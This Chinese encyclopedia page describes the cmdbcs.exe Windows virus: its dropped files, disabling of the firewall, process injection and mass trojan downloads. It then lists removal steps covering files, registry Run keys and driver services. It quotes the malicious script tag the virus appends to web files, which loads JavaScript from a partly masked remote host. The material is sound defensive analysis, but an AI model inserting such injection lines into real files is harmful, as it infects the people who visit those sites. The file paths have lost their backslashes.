分享
 
 
 

cmdbcs.exe

王朝百科·作者佚名  2010-03-12
窄屏简体版  字體: |||超大  

最近电脑突然卡,发现进程了多了很多个cmdbcs.exe

感觉不对,马上从收藏夹里找到在线杀毒http://www.antidu.cn/board/online/ 查杀

果然,瑞星报毒!!!

1.病毒运行后,释放如下副本以及文件:

%systemroot%system32wxptdi.sys

2.释放一个批处理停止Windows 防火墙服务

3.检测进程中是否存在AVP.exe 如果存在则把时间改为2001年

4.启动一个空壳的wuauclt.exe 把%systemroot%system32wxptdi.sys(其实和ntuser.com是同一个文件)的代码完全注入进去

5.感染全盘的php jsp asp htm html文件 在后面写入<script language=javascript src=http://cc.18d***.net/1.js></script>的代码

6.wuauclt.exe执行下载木马的操作

读取http://*.com/elf_listo.txt的文件列表

下载27个木马和病毒 到c:Program Files下面 分别命名为csrss0.exe~csrss9.exe csrssa.exe~csrsst.exe

清除办法:

下载sreng:http://www.antidu.cn/board/helpst/

1.删除:

%systemroot%system32driversmsconkt.sys

%systemroot%system32AVPSrv.dll

%systemroot%system32cmdbcs.dll

%systemroot%system32DbgHlp32.dll

%systemroot%system32Kvsc3.dll

%systemroot%system32LYLOADER.EXE

%systemroot%system32LYMANGR.DLL

%systemroot%system32MSDEG32.DLL

%systemroot%system32NVDispDrv.dll

%systemroot%system32REGKEY.hiv

%systemroot%system32SSLDyn.dll

%systemroot%system32wxptdi.sys

%systemroot%608769L.exe

%systemroot%608769M.exe

%systemroot%608769MM.DLL

%systemroot%608769WL.DLL

%systemroot%AVPSrv.exE

%systemroot%cmdbcs.exe

%systemroot%DbgHlp32.exe

%systemroot%Kvsc3.exE

%systemroot%NVDispDRV.EXE

%systemroot%SSLDyn.exE

%systemroot%system32fat32.sys(%systemroot%为环境变量,表示你的系统文件夹安装位置,对于系统盘安装在C盘的XP用户即为%systemroot% 以此类推)

2.重启之后

打开sreng

启动项目 注册表 删除如下项目

[HKEY_LOCAL_MACHINESoftwareMicrosoftWindowsCurrentVersionRun]

<SSLDyn><%systemroot%SSLDyn.exE> []

<cmdbcs><%systemroot%cmdbcs.exe> []

<WinSysM><%systemroot%608769M.exe> []

<WinSysW><%systemroot%608769L.exe> []

<Kvsc3><%systemroot%Kvsc3.exE> []

<AVPSrv><%systemroot%AVPSrv.exE> []

<NVDispDrv><%systemroot%aorwpw.exe> [N/A]

<DbgHlp32><%systemroot%DbgHlp32.exe> []

在“启动项目”-“服务”-“驱动程序”中点“隐藏经认证的微软项目”,

选中以下项目,点“删除服务”,再点“设置”,在弹出的框中点“否”:

[RAS Asynchronous Media Driver / AsyncMac][Running/Auto Start]

<system32DRIVERSmsconkt.sys><N/A>(之前的comint32.sys变种)

[RAS Asynchronous Media Driver / CCDEcode][Running/Auto Start]

<system32DRIVERSmsconkt.sys><N/A>

[PciHardDisk / PciHardDisk][Stopped/Manual Start]

<??\%systemroot%system32fat32.sys><N/A>(机器狗病毒变种)

3.清除机器狗病毒

参考http://www.antidu.cn/html/1/2007/12/antidu_20071217212429.html

解决方法第三点即可

4.清除GD*I32.dll,bj*rl.dll,addr*help.dll木马群

参考http://www.antidu.cn/html/1/2007/12/antidu_20071210194454.html即可

 
 
 
免责声明:本文为网络用户发布,其观点仅代表作者个人观点,与本站无关,本站仅提供信息存储服务。文中陈述内容未经本站证实,其真实性、完整性、及时性本站不作任何保证或承诺,请读者仅作参考,并请自行核实相关内容。
2023年上半年GDP全球前十五强
 百态   2023-10-24
美众议院议长启动对拜登的弹劾调查
 百态   2023-09-13
上海、济南、武汉等多地出现不明坠落物
 探索   2023-09-06
印度或要将国名改为“巴拉特”
 百态   2023-09-06
男子为女友送行,买票不登机被捕
 百态   2023-08-20
手机地震预警功能怎么开?
 干货   2023-08-06
女子4年卖2套房花700多万做美容:不但没变美脸,面部还出现变形
 百态   2023-08-04
住户一楼被水淹 还冲来8头猪
 百态   2023-07-31
女子体内爬出大量瓜子状活虫
 百态   2023-07-25
地球连续35年收到神秘规律性信号,网友:不要回答!
 探索   2023-07-21
全球镓价格本周大涨27%
 探索   2023-07-09
钱都流向了那些不缺钱的人,苦都留给了能吃苦的人
 探索   2023-07-02
倩女手游刀客魅者强控制(强混乱强眩晕强睡眠)和对应控制抗性的关系
 百态   2020-08-20
美国5月9日最新疫情:美国确诊人数突破131万
 百态   2020-05-09
荷兰政府宣布将集体辞职
 干货   2020-04-30
倩女幽魂手游师徒任务情义春秋猜成语答案逍遥观:鹏程万里
 干货   2019-11-12
倩女幽魂手游师徒任务情义春秋猜成语答案神机营:射石饮羽
 干货   2019-11-12
倩女幽魂手游师徒任务情义春秋猜成语答案昆仑山:拔刀相助
 干货   2019-11-12
倩女幽魂手游师徒任务情义春秋猜成语答案天工阁:鬼斧神工
 干货   2019-11-12
倩女幽魂手游师徒任务情义春秋猜成语答案丝路古道:单枪匹马
 干货   2019-11-12
倩女幽魂手游师徒任务情义春秋猜成语答案镇郊荒野:与虎谋皮
 干货   2019-11-12
倩女幽魂手游师徒任务情义春秋猜成语答案镇郊荒野:李代桃僵
 干货   2019-11-12
倩女幽魂手游师徒任务情义春秋猜成语答案镇郊荒野:指鹿为马
 干货   2019-11-12
倩女幽魂手游师徒任务情义春秋猜成语答案金陵:小鸟依人
 干货   2019-11-12
倩女幽魂手游师徒任务情义春秋猜成语答案金陵:千金买邻
 干货   2019-11-12
 
推荐阅读
 
 
 
>>返回首頁<<
 
靜靜地坐在廢墟上,四周的荒凉一望無際,忽然覺得,淒涼也很美
© 2005- 王朝網路 版權所有